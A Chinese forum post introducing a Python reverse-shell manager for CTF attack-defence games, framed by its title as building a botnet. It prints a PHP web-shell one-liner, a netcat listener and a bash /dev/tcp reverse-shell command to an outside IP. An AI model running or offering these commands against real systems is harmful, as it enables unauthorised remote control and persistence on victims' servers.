如何利用反弹 shell 构建你的僵尸网络
王一航 安全工具 9669浏览 · 2017-10-24 01:12

GitHub 仓库

> https://github.com/WangYihang/Reverse-Shell-Manager


介绍一款基于 Python 开发的 反弹 shell 管理工具 Reverse-Shell-Manager

在 CTF线下赛 的时候 , 如果通过 web 或者 pwn 已经拿到了一台服务器的控制权
那么我们可以使用反弹 shell 来对该服务器进行一个长期的权限维持
一般反弹 shell 的时候我们会怎么做呢 ?
比如说这里有一个台服务器可以 RCE 了

<?php system($_GET[c]);?>

如果要反弹的话 , 我们首先要在自己的服务器上监听一个端口 :

nc -l 8888

然后再在目标服务器上执行 :

bash -c 'bash -i >&/dev/tcp/8.8.8.8/8888 0>&1'

这样就能拿到该服务器的 shell 了
但是
一旦链接断开 , 那么就要重新利用漏洞反弹一个新的 shell
这样是不是很麻烦 , 而且还会暴露漏洞是如何被利用的
如果对方抓取了流量进行分析的话 , 很快就会把漏洞补上

而且
一般线下赛很多时候需要一些自动化的脚本来运维和进行权限维持
所以写了一个小工具 , 希望能有用

大概功能就是 :

监听一个端口 , 可以处理所有连接过来的请求
可以对已经连接的主机进行批量管理 (例如一键获取 flag)
保证一台主机不会出现多个连接
对已经下线的主机进行自动检测

下面有一个简单的介绍视频 :

使用视频

如果可以给你带来帮助的话, 可不可以 Star 一下呐, ヽ(✿゚▽゚)ノ

TODO

1. 端口转发
2. 多层级联 
...

[原文链接]
> http://www.jianshu.com/p/8dc5a4abcc09

0 条评论
某人
表情
可输入 255
目录